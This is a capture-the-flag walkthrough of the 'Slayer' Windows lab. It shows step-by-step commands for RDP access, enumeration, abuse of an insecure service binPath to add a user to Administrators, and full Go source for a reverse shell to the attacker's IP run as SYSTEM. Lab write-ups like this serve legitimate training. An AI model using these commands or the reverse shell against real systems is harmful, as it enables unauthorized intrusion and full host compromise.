Slayer

Challenge Lab (Easy) - by Ryan Yager

CourseStackwww.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

---

Scenario

Objective and Scope

Following a successful social engineering engagement, you have obtained user-level credentials for a corporate workstation. Your objective is to leverage this initial access to perform deep reconnaissance on the internal Windows host. The final goal is to escalate privileges and capture the root flag from the administrator's directory to demonstrate full system compromise.

Starting Credentials

tyler.ramsey:P@ssw0rd!

Summary

Summary

In this engagement we gain interactive access to the Windows host by authenticating with available user credentials and pivoting to a more privileged account. Enumeration uncovers a misconfigured management service whose insecure configuration and filesystem permissions allow us to escalate the privileged user into the local Administrators group and recover the Administrator flag. Finally, by abusing the same service to run a custom payload we obtain a SYSTEM-level shell, demonstrating a full attack chain from initial access to complete host compromise while avoiding noisy detections.

Recon

We start with a rustscan followed by services and default script scan, and we find ports 135 RPC, 445 SMB, 3389 RDP, and 49670 RPC to be open.

rustscan -b 500 -a 10.1.236.103 -- -sC -sV -Pn

The host appears to be a Windows machine Windows 10 build 26100 named EC2AMAZ-M1LFCNO.

RDP via tyler.ramsey

We already have credentials available from the scenario and are testing whether we can connect using RDP with these credentials. We are using Netexec for this. We can see that we are able to authenticate.

nxc rdp 10.1.236.103 -u tyler.ramsey -p 'P@ssw0rd!'

So we connect and use xfreerdp for this. Alternatively, we could also use Remmina or other tools.

xfreerdp +clipboard /u:tyler.ramsey  /p:'P@ssw0rd!' /v:10.1.236.103 /cert-ignore

RDP via alice.wonderland

As tyler.ramsey, we see that we do not have any special permissions.

In addition to tyler.ramsey, we also find another user account, alice.wonderland.

We use automated tools to enumerate the target. To get this onto the machine, we host an SMB server using Impacket.

smbserver.py -smb2support EXEGOL $(pwd) -username 0xb0b -password 0xb0b

We use PrivescCehck.ps1 for enumeration, which does not get detected by the AV.

GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for WindowsGitHub

We map the \\10.200.14.213\EXEGOL network share to the x: drive on the local system, using the user0xb0b and password 0xb0b that we have chosen.

net use x: \\10.200.14.213\EXEGOL /user:0xb0b 0xb0b

Next, we copy the script from the share to the target.

copy x:\PrivescCheck.ps1 PrivescCheck.ps1    

We run for extended checks and let the script creat a human-readable report

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

In the summary, we can already see that services are likely to be a potential privilege escalation vector.

We copy the reports to our attacker machine.

copy PrivescCheck_EC2AMAZ-M1LFCNO.html x:\PrivescCheck_EC2AMAZ-M1LFCNO.html
copy PrivescCheck_EC2AMAZ-M1LFCNO.txt x:\PrivescCheck_EC2AMAZ-M1LFCNO.txt

We identify the SysMgmtAgent Service to be a potential candidate for privilege escalation since the Windows service's executable file - the ImagePath - has insecure file system permission. We need to check if we can write to the serices binary and if we are able to stop/start the service.

We query for the Service, but we are not allowed to start the service.

sc.exe query SysMgmtAgent

sc.exe start SysMgmtAgent

We will continue manually. Probably we have to escalate to alice.wonderland. In the root folder we find a suspicious Management folder.

This folder contains some Management files but also a desktop.ini file. Fortunately this contains the credentials of alice.wonderland.

Get-ChildItem -Force | Format-Table Mode, LastWriteTime, Length, Name

We test whether we can connect using RDP with these credentials. We are using Netexec for this. We can see that we are able to authenticate.

nxc rdp 10.1.236.103 -u alice.wonderland -p 'REDACTED'  

Next, we are using xfreerdp to connect to the target machine as alice.wonderland.

xfreerdp +clipboard /u:alice.wonderland  /p:'REDACTED' /v:10.1.236.103 /cert-ignore

Privilege Escalation

Recalling the SysMgmtAgent, we check if we can start the service, and are successful.

sc.exe query SysMgmtAgent

sc.exe start SysMgmtAgent

We stop the service.

sc.exe stop SysMgmtAgent

Next, we try to elevate the permissions of alice.wonderland by adding the user to the local Administrators group. We reconfigure the SysMgmtAgent service to run the command that adds the user alice.wonderland to the local Administrators group when the service starts.

sc.exe config SysMgmtAgent binPath= "cmd.exe /c net localgroup Administrators /add alice.wonderland"

Now we start the service, and see that the user alice.wonderland is now part of the local Administrators group.

sc.exe start SysMgmtAgent

Next, we run a powershell session as Administrator and are able to retrieve the final flag at C:\Users\Administrator\root.txt.

Shell as NT Authority System

To get a reverse shell as NT Authority System we can craft a simple reverse shell using Go. This should not be easily detected by an AV. However, we have to compile this on a Windows host.

0xb0b.go

package main

import (
    "net"
    "os/exec"
)

func main() {
    c, _ := net.Dial("tcp", "10.200.14.213:4445")
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}

We build the reverse shell.

go build -o 0xb0b.exe 0xb0b.go

And prepare a listener using Penelope. Penelope is a reverse shell handler which tries to auto upgrade the catched reverse shell, fixes TTY size and allows us to manage our

penelope -p 4445

We transfer the reverse shell to the target system at C:\Management\0xb0b.exe.

copy x:\0xb0b.exe 0xb0b.exe

Next, we set the binPath to C:\Management\0xb0b.exe.

sc.exe config SysMgmtAgent binPath= "C:\Management\0xb0b.exe"

We start the service...

sc.exe start SysMgmtAgent

... and receive a connection as NT Authority System.